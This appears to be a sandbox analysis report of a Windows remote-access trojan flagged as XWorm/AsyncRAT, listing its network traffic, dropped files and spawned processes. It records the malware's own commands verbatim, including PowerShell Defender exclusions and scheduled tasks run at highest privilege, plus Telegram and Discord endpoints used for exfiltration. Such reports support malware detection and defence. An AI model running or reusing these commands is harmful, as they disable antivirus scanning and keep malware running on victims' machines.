                                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                    Source: unknown | DNS query: name: ip-api.com
                                    Source: unknown | TCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002A66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: #www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002A66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002A66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                    Source: global trafficDNS traffic detected: DNS query: 122295cm.n9shteam.in
                                    Source: powershell.exe, 0000000E.00000002.1699293862.0000025F293F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                                    Source: powershell.exe, 00000008.00000002.1382080691.00000291C4810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m)1
                                    Source: powershell.exe, 0000000B.00000002.1510501771.000001A7EB190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                    Source: powershell.exe, 0000000B.00000002.1510501771.000001A7EB190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                                    Source: powershell.exe, 0000000E.00000002.1694832376.0000025F2917E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                                    Source: svchost.exe, 0000001C.00000002.2731978464.0000027FE9000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                    Source: edb.log.28.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                    Source: HaLCYOFjMN.exeString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                    Source: powershell.exe, 00000008.00000002.1374360304.00000291BC071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1480589224.000001A790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1671013301.0000025F20E5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000008.00000002.1358832302.00000291AC229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F11018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1358832302.00000291AC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F10DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880001000.00000004.00000800.00020000.00000000.sdmp, portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000008.00000002.1358832302.00000291AC229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F11018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 0000000E.00000002.1698122440.0000025F29337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                                    Source: powershell.exe, 00000008.00000002.1358832302.00000291AC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F10DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                                    Source: HaLCYOFjMN.exeString found in binary or memory: https://api.telegram.org/bot
                                    Source: powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                                    Source: edb.log.28.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                                    Source: svchost.exe, 0000001C.00000003.2101646208.0000027FE8E20000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                                    Source: powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 00000008.00000002.1374360304.00000291BC071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1480589224.000001A790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1671013301.0000025F20E5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: qmgr.db.28.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49975 version: TLS 1.2

                                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                                    Source: 5.2.HaLCYOFjMN.exe.7f0000.0.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_e2258485-b

                                    Spam, unwanted Advertisements and Ransom Demands

                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                                    Operating System Destruction

                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: 01 00 00 00

                                    System Summary

                                    Source: HaLCYOFjMN.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                                    Source: HaLCYOFjMN.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                                    Source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: cnvwov.EXE.5.dr, Strings.csLarge array initialization: Strings: array initializer size 6160
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C66FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,24_2_00C66FAA
                                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\6ccacd8608530f
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEProcess token adjusted: Security
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: String function: 00C7F5F0 appears 31 times
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: String function: 00C7EB78 appears 39 times
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: String function: 00C7EC50 appears 56 times
                                    Source: HaLCYOFjMN.exe, 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameupdate.exe4 vs HaLCYOFjMN.exe
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2732554240.00000000007F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRemoteDesktop.dll< vs HaLCYOFjMN.exe
                                    Source: HaLCYOFjMN.exeBinary or memory string: OriginalFilenameupdate.exe4 vs HaLCYOFjMN.exe
                                    Source: HaLCYOFjMN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: HaLCYOFjMN.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                                    Source: HaLCYOFjMN.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                                    Source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: HaLCYOFjMN.exe, XNIJZHKIRB1ZVtDdGV.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: HaLCYOFjMN.exe, KoYQeD3DHuuDcMrQ12.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: cnvwov.EXE.5.dr, PBE.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: cnvwov.EXE.5.dr, Strings.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 5.2.HaLCYOFjMN.exe.7f0000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@81/76@3/4
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C66C74 GetLastError,FormatMessageW,24_2_00C66C74
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,24_2_00C7A6C2
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile created: C:\Users\user\AppData\Roaming\Update.exe
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-ue3JZ8LnyDYDzLQZpNKo
                                    Source: C:\Program Files\Windows Mail\System.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1268:120:WilError_03
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeMutant created: \Sessions\1\BaseNamedObjects\V2LiHkO7nVx8rIGb
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmp
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat" "
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCommand line argument: sfxname24_2_00C7DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCommand line argument: sfxstime24_2_00C7DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCommand line argument: STARTDLG24_2_00C7DF1E
                                    Source: HaLCYOFjMN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: HaLCYOFjMN.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile read: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: HaLCYOFjMN.exeReversingLabs: Detection: 78%
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile read: C:\Users\user\Desktop\HaLCYOFjMN.exe
                                    Source: unknownProcess created: C:\Users\user\Desktop\HaLCYOFjMN.exe "C:\Users\user\Desktop\HaLCYOFjMN.exe"
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'HaLCYOFjMN.exe'
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Update.exe'
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe"
                                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Update.exe C:\Users\user\AppData\Roaming\Update.exe
                                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Update.exe "C:\Users\user\AppData\Roaming\Update.exe"
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Users\user\AppData\Local\Temp\rqbprm.exe "C:\Users\user\AppData\Local\Temp\rqbprm.exe"
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Users\user\AppData\Local\Temp\cnvwov.EXE "C:\Users\user\AppData\Local\Temp\cnvwov.EXE"
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe"
                                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\agentwebreviewDhcp\portBrowserweb.exe "C:\agentwebreviewDhcp/portBrowserweb.exe"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\System.exe'" /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP"
                                    Source: unknownProcess created: C:\Program Files\Windows Mail\System.exe "C:\Program Files\Windows Mail\System.exe"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1BB6.tmp" "c:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1F7E.tmp" "c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 11 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 7 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\agentwebreviewDhcp\WmiPrvSE.exe'" /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
